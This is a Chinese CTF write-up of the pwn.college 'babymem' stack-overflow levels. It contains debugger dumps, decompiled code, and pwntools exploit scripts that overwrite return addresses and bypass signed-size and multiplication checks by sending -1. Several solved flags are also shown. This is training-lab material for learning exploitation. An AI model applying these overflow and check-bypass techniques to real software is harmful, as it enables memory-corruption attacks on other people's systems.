0x0000000000401bc9 <+183>: call 0x401130 <printf@plt> 0x0000000000401bce <+188>: lea rax,[rbp-0x88] 0x0000000000401bd5 <+195>: mov rsi,rax 0x0000000000401bd8 <+198>: lea rdi,[rip+0x53c] # 0x40211b 0x0000000000401bdf <+205>: mov eax,0x0 0x0000000000401be4 <+210>: call 0x401180 <__isoc99_scanf@plt> 0x0000000000401be9 <+215>: mov rax,QWORD PTR [rbp-0x88] 0x0000000000401bf0 <+222>: mov rsi,rax 0x0000000000401bf3 <+225>: lea rdi,[rip+0x526] # 0x402120 0x0000000000401bfa <+232>: mov eax,0x0 0x0000000000401bff <+237>: call 0x401130 <printf@plt> 0x0000000000401c04 <+242>: mov rdx,QWORD PTR [rbp-0x88] 0x0000000000401c0b <+249>: mov rax,QWORD PTR [rbp-0x8] 0x0000000000401c0f <+253>: mov rsi,rax 0x0000000000401c12 <+256>: mov edi,0x0 0x0000000000401c17 <+261>: call 0x401150 <read@plt> 0x0000000000401c1c <+266>: mov DWORD PTR [rbp-0xc],eax 0x0000000000401c1f <+269>: cmp DWORD PTR [rbp-0xc],0x0 0x0000000000401c23 <+273>: jns 0x401c51 <challenge+319> 0x0000000000401c25 <+275>: call 0x401100 <__errno_location@plt> 0x0000000000401c2a <+280>: mov eax,DWORD PTR [rax] 0x0000000000401c2c <+282>: mov edi,eax 0x0000000000401c2e <+284>: call 0x4011a0 <strerror@plt> 0x0000000000401c33 <+289>: mov rsi,rax 0x0000000000401c36 <+292>: lea rdi,[rip+0x50b] # 0x402148 0x0000000000401c3d <+299>: mov eax,0x0 0x0000000000401c42 <+304>: call 0x401130 <printf@plt> 0x0000000000401c47 <+309>: mov edi,0x1 0x0000000000401c4c <+314>: call 0x401190 <exit@plt> 0x0000000000401c51 <+319>: lea rdi,[rip+0x514] # 0x40216c 0x0000000000401c58 <+326>: call 0x401110 <puts@plt> 0x0000000000401c5d <+331>: mov eax,0x0 0x0000000000401c62 <+336>: leave 0x0000000000401c63 <+337>: retEnd of assembler dump.pwndbg> b *challenge+261Breakpoint 1 at 0x401c17pwndbg> rStarting program: /home/cub3y0nd/Projects/pwn.college/babymem-level-3-1[Thread debugging using libthread_db enabled]Using host libthread_db library "/usr/lib/libthread_db.so.1".###### Welcome to /home/cub3y0nd/Projects/pwn.college/babymem-level-3-1!###
Payload size: 1771Send your payload (up to 1771 bytes)!
Breakpoint 1, 0x0000000000401c17 in challenge ()20 collapsed lines
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────── RAX 0x7fffffffd130 ◂— 0 RBX 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-3-1' RCX 0 RDX 0x6eb RDI 0 RSI 0x7fffffffd130 ◂— 0 R8 0x75 R9 0xfffffffc R10 0 R11 0x202 R12 1 R13 0 R14 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0 R15 0 RBP 0x7fffffffd1b0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0 RSP 0x7fffffffd100 ◂— 0xa /* '\n' */ RIP 0x401c17 (challenge+261) ◂— call 0x401150────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── ► 0x401c17 <challenge+261> call read@plt <read@plt> fd: 0 (/dev/pts/2) buf: 0x7fffffffd130 ◂— 0 nbytes: 0x6eb30 collapsed lines
0x401c1c <challenge+266> mov dword ptr [rbp - 0xc], eax 0x401c1f <challenge+269> cmp dword ptr [rbp - 0xc], 0 0x401c23 <challenge+273> jns challenge+319 <challenge+319>
0x401c25 <challenge+275> call __errno_location@plt <__errno_location@plt>
0x401c2a <challenge+280> mov eax, dword ptr [rax] 0x401c2c <challenge+282> mov edi, eax 0x401c2e <challenge+284> call strerror@plt <strerror@plt>
0x401c33 <challenge+289> mov rsi, rax 0x401c36 <challenge+292> lea rdi, [rip + 0x50b] RDI => 0x402148 ◂— 'ERROR: Failed to read input -- %s!\n' 0x401c3d <challenge+299> mov eax, 0 EAX => 0─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────00:0000│ rsp 0x7fffffffd100 ◂— 0xa /* '\n' */01:0008│-0a8 0x7fffffffd108 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f1 ◂— 'SHELL=/usr/bin/zsh'02:0010│-0a0 0x7fffffffd110 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-3-1'03:0018│-098 0x7fffffffd118 ◂— 0x10000000004:0020│-090 0x7fffffffd120 —▸ 0x7fffffffd140 ◂— 005:0028│-088 0x7fffffffd128 ◂— 0x6eb06:0030│ rax rsi 0x7fffffffd130 ◂— 007:0038│-078 0x7fffffffd138 ◂— 0───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────── ► 0 0x401c17 challenge+261 1 0x401d2a main+198 2 0x7ffff7dcae08 3 0x7ffff7dcaecc __libc_start_main+140 4 0x4011de _start+46────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────pwndbg> i frameStack level 0, frame at 0x7fffffffd1c0: rip = 0x401c17 in challenge; saved rip = 0x401d2a called by frame at 0x7fffffffe1f0 Arglist at 0x7fffffffd1b0, args: Locals at 0x7fffffffd1b0, Previous frame's sp is 0x7fffffffd1c0 Saved registers: rbp at 0x7fffffffd1b0, rip at 0x7fffffffd1b8pwndbg> distance 0x7fffffffd130 0x7fffffffd1b80x7fffffffd130->0x7fffffffd1b8 is 0x88 bytes (0x11 words)
很显然这是想让我们覆盖返回地址控制程序执行流程,达到执行 win
from pwn import context, ELF, process, remote, gdb, p64
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-3-1"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch()
payload = b"".ljust(0x88, b"A") + p64(0x401A0B)payload_size = str(len(payload)).encode()
target.recvuntil(b"Payload size: ")target.sendline(payload_size)target.recvuntil(b"Send your payload")target.send(payload)
Flag: pwn.college{k2xNTDjO8L-Rt_oy5sU-i2dFj1y.0FN5IDL5cTNxgzW}
Level 4.0
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time bypass a check designed to prevent you from doing so!
3 collapsed lines
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3){ int *v3; // rax char *v4; // rax _QWORD v6[3]; // [rsp+0h] [rbp-B0h] BYREF int v7; // [rsp+1Ch] [rbp-94h] size_t nbytes[15]; // [rsp+2Ch] [rbp-84h] BYREF int v9; // [rsp+A4h] [rbp-Ch] void *buf; // [rsp+A8h] [rbp-8h] __int64 savedregs; // [rsp+B0h] [rbp+0h] BYREF41 collapsed lines
_UNKNOWN *retaddr; // [rsp+B8h] [rbp+8h] BYREF
v7 = a1; v6[2] = a2; v6[1] = a3; buf = (char *)nbytes + 4; memset(nbytes, 0, 110); puts("The challenge() function has just been launched!"); sp_ = (__int64)v6; bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2; rp_ = (__int64)&retaddr; puts("Before we do anything, let's take a look at challenge()'s stack frame:"); DUMP_STACK(sp_, sz_); printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_); printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_); puts("including the saved base pointer and the saved return address, for a"); printf("total of %d bytes.\n", 8 * sz_); printf("The input buffer begins at %p, partway through the stack frame,\n", buf); puts("(\"above\" it in the stack are other local variables used by the function)."); puts("Your input will be read into this buffer."); printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 106); puts("large input length, and thus overflow the buffer.\n"); puts("In this level, there is no \"win\" variable."); puts("You will need to force the program to execute the win() function"); puts("by directly overflowing into the stored return address back to main,"); printf( "which is stored at %p, %d bytes after the start of your input buffer.\n", (const void *)rp_, rp_ - (_DWORD)buf); printf( "That means that you will need to input at least %d bytes (%d to fill the buffer,\n", rp_ - (_DWORD)buf + 8, 106); printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 106); puts("and 8 that will overwrite the return address).\n"); puts("We have disabled the following standard memory corruption mitigations for this challenge:"); puts("- the canary is disabled, otherwise you would corrupt it before"); puts("overwriting the return address, and the program would abort."); puts("- the binary is *not* position independent. This means that it will be"); puts("located at the same spot every time it is run, which means that by"); puts("analyzing the binary (using objdump or reading this output), you can"); puts("know the exact value that you need to overwrite the return address with.\n"); printf("Payload size: "); __isoc99_scanf("%i", nbytes); puts("This challenge is more careful: it will check to make sure you"); puts("don't want to provide so much data that the input buffer will"); puts("overflow. But recall twos compliment, look at how the check is"); puts("implemented, and try to beat it!"); if ( SLODWORD(nbytes[0]) > 106 ) { puts("Provided size is too large!"); exit(1); } puts("You made it past the check! Because the read() call will interpret"); puts("your size differently than the check above, the resulting read will"); puts("be unstable and might fail. You will likely have to try this several");14 collapsed lines
puts("times before your input is actually read."); printf("You have chosen to send %i bytes of input!\n", LODWORD(nbytes[0])); printf("This will allow you to write from %p (the start of the input buffer)\n", buf); printf( "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", (char *)buf + SLODWORD(nbytes[0]), LODWORD(nbytes[0]) - 106); printf("Of these, you will overwrite %d bytes into the return address.\n", (_DWORD)buf + LODWORD(nbytes[0]) - rp_); puts("If that number is greater than 8, you will overwrite the entire return address.\n"); puts("You will want to overwrite the return value from challenge()"); printf("(located at %p, %d bytes past the start of the input buffer)\n", (const void *)rp_, rp_ - (_DWORD)buf); printf("with %p, which is the address of the win() function.\n", win); puts("This will cause challenge() to return directly into the win() function,"); puts("which will in turn give you the flag."); puts("Keep in mind that you will need to write the address of the win() function"); puts("in little-endian (bytes backwards) so that it is interpreted properly.\n"); printf("Send your payload (up to %i bytes)!\n", LODWORD(nbytes[0])); v9 = read(0, buf, LODWORD(nbytes[0])); if ( v9 < 0 ) { v3 = __errno_location();20 collapsed lines
v4 = strerror(*v3); printf("ERROR: Failed to read input -- %s!\n", v4); exit(1); } printf("You sent %d bytes!\n", v9); puts("Let's see what happened with the stack:\n"); DUMP_STACK(sp_, sz_); puts("The program's memory status:"); printf("- the input buffer starts at %p\n", buf); printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_); printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_); printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_); printf("- the address of win() is %p.\n", win); putchar(10); puts("If you have managed to overwrite the return address with the correct value,"); puts("challenge() will jump straight to win() when it returns."); printf("Let's try it now!\n\n"); puts("Goodbye!"); return 0LL;}
// ...
if ( SLODWORD(nbytes[0]) > 106 ){ puts("Provided size is too large!"); exit(1);}
SLODWORD(nbytes[0]) > 106
则退出程序。但是我们的 payload 为 144 bytes(提示信息中已经说明了 payload 长度),因此显然不能在 payload size 中直接输入 144。
为了绕过这一点,我们注意到 nbytes
的类型为 size_t
// ...
size_t nbytes[15]; // [rsp+2Ch] [rbp-84h] BYREF
因为 size_t
会被表示成 0xffffffff
又因为程序使用 SLODWORD
来判断,这是获取一个有符号数的低 DWORD
那么如果我们输入 -1
,则程序最后执行 SLODWORD(nbytes[0]) > 106
时判断的会是 0xffffffff
和 106
的大小。很显然前者小于后者,成功绕过了这个 if
而由于有符号数被隐式转换为无符号数保存在了 nbytes
正好 read
// ...
v9 = read(0, buf, LODWORD(nbytes[0]));
from pwn import context, ELF, process, remote, gdb, p64
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-4-0"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch()
payload = b"".ljust(0x88, b"A") + p64(0x4020F3)
target.recvuntil(b"Payload size: ")target.sendline(b"-1")target.recvuntil(b"Send your payload")target.send(payload)
Flag: pwn.college{YWYtWHsecMbA0xSnI1_Yfj-kjlB.0VN5IDL5cTNxgzW}
Level 4.1
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time bypass a check designed to prevent you from doing so!
9 collapsed lines
__int64 challenge(){ int *v0; // rax char *v1; // rax size_t nbytes[7]; // [rsp+2Ch] [rbp-44h] BYREF int v4; // [rsp+64h] [rbp-Ch] void *buf; // [rsp+68h] [rbp-8h]
buf = (char *)nbytes + 4; memset(nbytes, 0, 50); printf("Payload size: "); __isoc99_scanf("%i", nbytes); if ( SLODWORD(nbytes[0]) > 46 ) { puts("Provided size is too large!"); exit(1); } printf("Send your payload (up to %i bytes)!\n", LODWORD(nbytes[0])); v4 = read(0, buf, LODWORD(nbytes[0])); if ( v4 < 0 ) { v0 = __errno_location();7 collapsed lines
v1 = strerror(*v0); printf("ERROR: Failed to read input -- %s!\n", v1); exit(1); } puts("Goodbye!"); return 0LL;}
和上一题思路相同,都是通过有符号数隐式转换为无符号数绕过 payload 长度判断,然后覆盖返回地址。几乎没区别,这里就不再赘述分析过程了。
pwndbg> i fun20 collapsed lines
All defined functions:
Non-debugging symbols:0x0000000000401000 _init0x00000000004010f0 putchar@plt0x0000000000401100 __errno_location@plt0x0000000000401110 puts@plt0x0000000000401120 write@plt0x0000000000401130 printf@plt0x0000000000401140 geteuid@plt0x0000000000401150 read@plt0x0000000000401160 setvbuf@plt0x0000000000401170 open@plt0x0000000000401180 __isoc99_scanf@plt0x0000000000401190 exit@plt0x00000000004011a0 strerror@plt0x00000000004011b0 _start0x00000000004011e0 _dl_relocate_static_pie0x00000000004011f0 deregister_tm_clones0x0000000000401220 register_tm_clones0x0000000000401260 __do_global_dtors_aux0x0000000000401290 frame_dummy0x0000000000401296 bin_padding0x0000000000401704 win0x000000000040180b challenge0x0000000000401921 main0x0000000000401a00 __libc_csu_init2 collapsed lines
0x0000000000401a70 __libc_csu_fini0x0000000000401a78 _finipwndbg> disass challengeDump of assembler code for function challenge: 0x000000000040180b <+0>: endbr64 0x000000000040180f <+4>: push rbp 0x0000000000401810 <+5>: mov rbp,rsp55 collapsed lines
0x0000000000401813 <+8>: sub rsp,0x70 0x0000000000401817 <+12>: mov DWORD PTR [rbp-0x54],edi 0x000000000040181a <+15>: mov QWORD PTR [rbp-0x60],rsi 0x000000000040181e <+19>: mov QWORD PTR [rbp-0x68],rdx 0x0000000000401822 <+23>: mov QWORD PTR [rbp-0x40],0x0 0x000000000040182a <+31>: mov QWORD PTR [rbp-0x38],0x0 0x0000000000401832 <+39>: mov QWORD PTR [rbp-0x30],0x0 0x000000000040183a <+47>: mov QWORD PTR [rbp-0x28],0x0 0x0000000000401842 <+55>: mov QWORD PTR [rbp-0x20],0x0 0x000000000040184a <+63>: mov DWORD PTR [rbp-0x18],0x0 0x0000000000401851 <+70>: mov WORD PTR [rbp-0x14],0x0 0x0000000000401857 <+76>: lea rax,[rbp-0x40] 0x000000000040185b <+80>: mov QWORD PTR [rbp-0x8],rax 0x000000000040185f <+84>: mov DWORD PTR [rbp-0x44],0x0 0x0000000000401866 <+91>: lea rdi,[rip+0x89f] # 0x40210c 0x000000000040186d <+98>: mov eax,0x0 0x0000000000401872 <+103>: call 0x401130 <printf@plt> 0x0000000000401877 <+108>: lea rax,[rbp-0x44] 0x000000000040187b <+112>: mov rsi,rax 0x000000000040187e <+115>: lea rdi,[rip+0x896] # 0x40211b 0x0000000000401885 <+122>: mov eax,0x0 0x000000000040188a <+127>: call 0x401180 <__isoc99_scanf@plt> 0x000000000040188f <+132>: mov eax,DWORD PTR [rbp-0x44] 0x0000000000401892 <+135>: cmp eax,0x2e 0x0000000000401895 <+138>: jle 0x4018ad <challenge+162> 0x0000000000401897 <+140>: lea rdi,[rip+0x880] # 0x40211e 0x000000000040189e <+147>: call 0x401110 <puts@plt> 0x00000000004018a3 <+152>: mov edi,0x1 0x00000000004018a8 <+157>: call 0x401190 <exit@plt> 0x00000000004018ad <+162>: mov eax,DWORD PTR [rbp-0x44] 0x00000000004018b0 <+165>: mov esi,eax 0x00000000004018b2 <+167>: lea rdi,[rip+0x887] # 0x402140 0x00000000004018b9 <+174>: mov eax,0x0 0x00000000004018be <+179>: call 0x401130 <printf@plt> 0x00000000004018c3 <+184>: mov eax,DWORD PTR [rbp-0x44] 0x00000000004018c6 <+187>: mov edx,eax 0x00000000004018c8 <+189>: mov rax,QWORD PTR [rbp-0x8] 0x00000000004018cc <+193>: mov rsi,rax 0x00000000004018cf <+196>: mov edi,0x0 0x00000000004018d4 <+201>: call 0x401150 <read@plt> 0x00000000004018d9 <+206>: mov DWORD PTR [rbp-0xc],eax 0x00000000004018dc <+209>: cmp DWORD PTR [rbp-0xc],0x0 0x00000000004018e0 <+213>: jns 0x40190e <challenge+259> 0x00000000004018e2 <+215>: call 0x401100 <__errno_location@plt> 0x00000000004018e7 <+220>: mov eax,DWORD PTR [rax] 0x00000000004018e9 <+222>: mov edi,eax 0x00000000004018eb <+224>: call 0x4011a0 <strerror@plt> 0x00000000004018f0 <+229>: mov rsi,rax 0x00000000004018f3 <+232>: lea rdi,[rip+0x86e] # 0x402168 0x00000000004018fa <+239>: mov eax,0x0 0x00000000004018ff <+244>: call 0x401130 <printf@plt> 0x0000000000401904 <+249>: mov edi,0x1 0x0000000000401909 <+254>: call 0x401190 <exit@plt> 0x000000000040190e <+259>: lea rdi,[rip+0x877] # 0x40218c 0x0000000000401915 <+266>: call 0x401110 <puts@plt> 0x000000000040191a <+271>: mov eax,0x0 0x000000000040191f <+276>: leave 0x0000000000401920 <+277>: retEnd of assembler dump.pwndbg> b *challenge+201Breakpoint 1 at 0x4018d4pwndbg> rStarting program: /home/cub3y0nd/Projects/pwn.college/babymem-level-4-1[Thread debugging using libthread_db enabled]Using host libthread_db library "/usr/lib/libthread_db.so.1".###### Welcome to /home/cub3y0nd/Projects/pwn.college/babymem-level-4-1!###
Payload size: 16Send your payload (up to 16 bytes)!
Breakpoint 1, 0x00000000004018d4 in challenge ()20 collapsed lines
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────── RAX 0x7fffffffd170 ◂— 0 RBX 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-4-1' RCX 0 RDX 0x10 RDI 0 RSI 0x7fffffffd170 ◂— 0 R8 0x69 R9 0xfffffffe R10 0 R11 0x202 R12 1 R13 0 R14 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0 R15 0 RBP 0x7fffffffd1b0 —▸ 0x7fffffffe1e0 —▸ 0x7fffffffe280 —▸ 0x7fffffffe2e0 ◂— 0 RSP 0x7fffffffd140 —▸ 0x7fffffffd170 ◂— 0 RIP 0x4018d4 (challenge+201) ◂— call 0x401150────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────── ► 0x4018d4 <challenge+201> call read@plt <read@plt> fd: 0 (/dev/pts/2) buf: 0x7fffffffd170 ◂— 0 nbytes: 0x1030 collapsed lines
0x4018d9 <challenge+206> mov dword ptr [rbp - 0xc], eax 0x4018dc <challenge+209> cmp dword ptr [rbp - 0xc], 0 0x4018e0 <challenge+213> jns challenge+259 <challenge+259>
0x4018e2 <challenge+215> call __errno_location@plt <__errno_location@plt>
0x4018e7 <challenge+220> mov eax, dword ptr [rax] 0x4018e9 <challenge+222> mov edi, eax 0x4018eb <challenge+224> call strerror@plt <strerror@plt>
0x4018f0 <challenge+229> mov rsi, rax 0x4018f3 <challenge+232> lea rdi, [rip + 0x86e] RDI => 0x402168 ◂— 'ERROR: Failed to read input -- %s!\n' 0x4018fa <challenge+239> mov eax, 0 EAX => 0──────────────────────────────────────[ STACK ]──────────────────────────────────────00:0000│ rsp 0x7fffffffd140 —▸ 0x7fffffffd170 ◂— 001:0008│-068 0x7fffffffd148 —▸ 0x7fffffffe318 —▸ 0x7fffffffe6f1 ◂— 'SHELL=/usr/bin/zsh'02:0010│-060 0x7fffffffd150 —▸ 0x7fffffffe308 —▸ 0x7fffffffe6bb ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-4-1'03:0018│-058 0x7fffffffd158 ◂— 0x10000000a /* '\n' */04:0020│-050 0x7fffffffd160 —▸ 0x7ffff7f8d5c0 (_IO_2_1_stdout_) ◂— 0xfbad288705:0028│-048 0x7fffffffd168 ◂— 0x1000404020 /* ' @@' */06:0030│ rax rsi 0x7fffffffd170 ◂— 007:0038│-038 0x7fffffffd178 ◂— 0────────────────────────────────────[ BACKTRACE ]──────────────────────────────────── ► 0 0x4018d4 challenge+201 1 0x4019e7 main+198 2 0x7ffff7dcae08 3 0x7ffff7dcaecc __libc_start_main+140 4 0x4011de _start+46─────────────────────────────────────────────────────────────────────────────────────pwndbg> i frameStack level 0, frame at 0x7fffffffd1c0: rip = 0x4018d4 in challenge; saved rip = 0x4019e7 called by frame at 0x7fffffffe1f0 Arglist at 0x7fffffffd1b0, args: Locals at 0x7fffffffd1b0, Previous frame's sp is 0x7fffffffd1c0 Saved registers: rbp at 0x7fffffffd1b0, rip at 0x7fffffffd1b8pwndbg> distance 0x7fffffffd170 0x7fffffffd1b80x7fffffffd170->0x7fffffffd1b8 is 0x48 bytes (0x9 words)
from pwn import context, ELF, process, remote, gdb, p64
context(log_level="debug", terminal="kitty")
FILE = "./babymem-level-4-1"HOST = "pwn.college"PORT = 1337
gdbscript = """c"""
def launch(local=True, debug=False): if local: elf = ELF(FILE) context.binary = elf
if debug: return gdb.debug([elf.path], gdbscript=gdbscript) else: return process([elf.path]) else: return remote(HOST, PORT)
target = launch()
payload = b"".ljust(0x48, b"A") + p64(0x401704)
target.recvuntil(b"Payload size: ")target.sendline(b"-1")target.recvuntil(b"Send your payload")target.send(payload)
Flag: pwn.college{M-FCJzqtx7cmDX7yqpyi7jADAMM.0lN5IDL5cTNxgzW}
Level 5.0
- Category: Pwn
Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!
60 collapsed lines
__int64 __fastcall challenge(int a1, __int64 a2, __int64 a3){ int *v3; // rax char *v4; // rax _QWORD v6[3]; // [rsp+0h] [rbp-B0h] BYREF int v7; // [rsp+1Ch] [rbp-94h] unsigned int v8; // [rsp+28h] [rbp-88h] BYREF unsigned int v9; // [rsp+2Ch] [rbp-84h] BYREF _QWORD v10[12]; // [rsp+30h] [rbp-80h] BYREF __int16 v11; // [rsp+90h] [rbp-20h] int v12; // [rsp+9Ch] [rbp-14h] size_t nbytes; // [rsp+A0h] [rbp-10h] void *buf; // [rsp+A8h] [rbp-8h] __int64 savedregs; // [rsp+B0h] [rbp+0h] BYREF _UNKNOWN *retaddr; // [rsp+B8h] [rbp+8h] BYREF
v7 = a1; v6[2] = a2; v6[1] = a3; memset(v10, 0, sizeof(v10)); v11 = 0; buf = v10; nbytes = 0LL; puts("The challenge() function has just been launched!"); sp_ = (__int64)v6; bp_ = (__int64)&savedregs; sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v6) >> 3) + 2; rp_ = (__int64)&retaddr; puts("Before we do anything, let's take a look at challenge()'s stack frame:"); DUMP_STACK(sp_, sz_); printf("Our stack pointer points to %p, and our base pointer points to %p.\n", (const void *)sp_, (const void *)bp_); printf("This means that we have (decimal) %d 8-byte words in our stack frame,\n", sz_); puts("including the saved base pointer and the saved return address, for a"); printf("total of %d bytes.\n", 8 * sz_); printf("The input buffer begins at %p, partway through the stack frame,\n", buf); puts("(\"above\" it in the stack are other local variables used by the function)."); puts("Your input will be read into this buffer."); printf("The buffer is %d bytes long, but the program will let you provide an arbitrarily\n", 98); puts("large input length, and thus overflow the buffer.\n"); puts("In this level, there is no \"win\" variable."); puts("You will need to force the program to execute the win() function"); puts("by directly overflowing into the stored return address back to main,"); printf( "which is stored at %p, %d bytes after the start of your input buffer.\n", (const void *)rp_, rp_ - (_DWORD)buf); printf( "That means that you will need to input at least %d bytes (%d to fill the buffer,\n", rp_ - (_DWORD)buf + 8, 98); printf("%d to fill other stuff stored between the buffer and the return address,\n", rp_ - (_DWORD)buf - 98); puts("and 8 that will overwrite the return address).\n"); puts("We have disabled the following standard memory corruption mitigations for this challenge:"); puts("- the canary is disabled, otherwise you would corrupt it before"); puts("overwriting the return address, and the program would abort."); puts("- the binary is *not* position independent. This means that it will be"); puts("located at the same spot every time it is run, which means that by"); puts("analyzing the binary (using objdump or reading this output), you can"); puts("know the exact value that you need to overwrite the return address with.\n"); puts("This challenge will let you send multiple payload records concatenated together."); puts("It will make sure that the total payload size fits in the allocated buffer"); puts("on the stack. Can you send a carefully crafted input to break this calculation?"); printf("Number of payload records to send: "); __isoc99_scanf("%u", &v9); if ( !v9 ) __assert_fail("record_num > 0", "/challenge/babymem-level-5-0.c", 0x8Fu, "challenge"); printf("Size of each payload record: "); __isoc99_scanf("%u", &v8); if ( !v8 ) __assert_fail("record_size > 0", "/challenge/babymem-level-5-0.c", 0x92u, "challenge"); if ( v8 * v9 > 0x62 ) __assert_fail("record_size * record_num <= 98", "/challenge/babymem-level-5-0.c", 0x93u, "challenge"); nbytes = v8 * (unsigned __int64)v9; printf("Computed total payload size: %lu\n", nbytes); printf("You have chosen to send %lu bytes of input!\n", nbytes); printf("This will allow you to write from %p (the start of the input buffer)\n", buf);11 collapsed lines
printf( "right up to (but not including) %p (which is %d bytes beyond the end of the buffer).\n", (char *)buf + nbytes, nbytes - 98); printf("Of these, you will overwrite %d bytes into the return address.\n", nbytes + (_DWORD)buf - rp_); puts("If that number is greater than 8, you will overwrite the entire return address.\n"); puts("You will want to overwrite the return value from challenge()"); printf("(located at %p, %d bytes past the start of the input buffer)\n", (const void *)rp_, rp_ - (_DWORD)buf); printf("with %p, which is the address of the win() function.\n", win); puts("This will cause challenge() to return directly into the win() function,"); puts("which will in turn give you the flag."); puts("Keep in mind that you will need to write the address of the win() function"); puts("in little-endian (bytes backwards) so that it is interpreted properly.\n"); printf("Send your payload (up to %lu bytes)!\n", nbytes); v12 = read(0, buf, nbytes); if ( v12 < 0 ) { v3 = __errno_location();20 collapsed lines
v4 = strerror(*v3); printf("ERROR: Failed to read input -- %s!\n", v4); exit(1); } printf("You sent %d bytes!\n", v12); puts("Let's see what happened with the stack:\n"); DUMP_STACK(sp_, sz_); puts("The program's memory status:"); printf("- the input buffer starts at %p\n", buf); printf("- the saved frame pointer (of main) is at %p\n", (const void *)bp_); printf("- the saved return address (previously to main) is at %p\n", (const void *)rp_); printf("- the saved return address is now pointing to %p.\n", *(const void **)rp_); printf("- the address of win() is %p.\n", win); putchar(10); puts("If you have managed to overwrite the return address with the correct value,"); puts("challenge() will jump straight to win() when it returns."); printf("Let's try it now!\n\n"); puts("Goodbye!"); return 0LL;}
首先,两个 __isoc99_scanf
都读取无符号数,易想到补码性质和隐式转换问题。其次,读取输入后两条 if
分别判断两个 __isoc99_scanf
输入是否等于零,为零就断言失败。最后,不能满足 v8 * v9 > 0x62
这条判断,也就是输入的两个有符号数相乘(通过反汇编得知这里的乘法使用 imul
)的结果必须小于等于 98,否则也会断言失败。
通过程序给出的提示信息我们已经知道 payload 的大小为 144 bytes,所以我们要做的就是想办法满足在 v8 * v9 > 0x62
不成立的前提下获得起码 144 bytes 的输入大小。因为最后 read
的输入的大小是通过 nbytes = v8 * (unsigned __int64)v9;
设置的,所以我们只要关注 v8
如果我们输入两个 -1
,那确实绕过了 v8 * v9 > 0x62
。但是调试发现 nbytes
超出 ssize_t
的大小(显然 0xfffffffe00000001 > 2**63-1
)会导致 read
不会读取任何数据,直接返回 -1
pwndbg> cContinuing.
Breakpoint 2, 0x000000000040291c in challenge ()20 collapsed lines
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────*RAX 0x7ffd77ce3510 ◂— 0 RBX 0x7ffd77ce46e8 —▸ 0x7ffd77ce55a2 ◂— '/home/cub3y0nd/Projects/pwn.college/babymem-level-5-0' RCX 0*RDX 0xfffffffe00000001*RDI 0*RSI 0x7ffd77ce3510 ◂— 0*R8 0x75*R9 0xffffffec R10 0*R11 0x202 R12 1 R13 0 R14 0x796eb2ce0000 (_rtld_global) —▸ 0x796eb2ce12e0 ◂— 0 R15 0 RBP 0x7ffd77ce3590 —▸ 0x7ffd77ce45c0 —▸ 0x7ffd77ce4660 —▸ 0x7ffd77ce46c0 ◂— 0 RSP 0x7ffd77ce34e0 ◂— 0xa /* '\n' */*RIP 0x40291c (challenge+1342) ◂— call 0x401170────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────── ► 0x40291c <challenge+1342> call read@plt <read@plt> fd: 0 (pipe:[419970]) buf: 0x7ffd77ce3510 ◂— 0 nbytes: 0xfffffffe0000000130 collapsed lines
0x402921 <challenge+1347> mov dword ptr [rbp - 0x14], eax 0x402924 <challenge+1350> cmp dword ptr [rbp - 0x14], 0 0x402928 <challenge+1354> jns challenge+1400 <challenge+1400>
0x40292a <challenge+1356> call __errno_location@plt <__errno_location@plt>
0x40292f <challenge+1361> mov eax, dword ptr [rax] 0x402931 <challenge+1363> mov edi, eax 0x402933 <challenge+1365> call strerror@plt <strerror@plt>
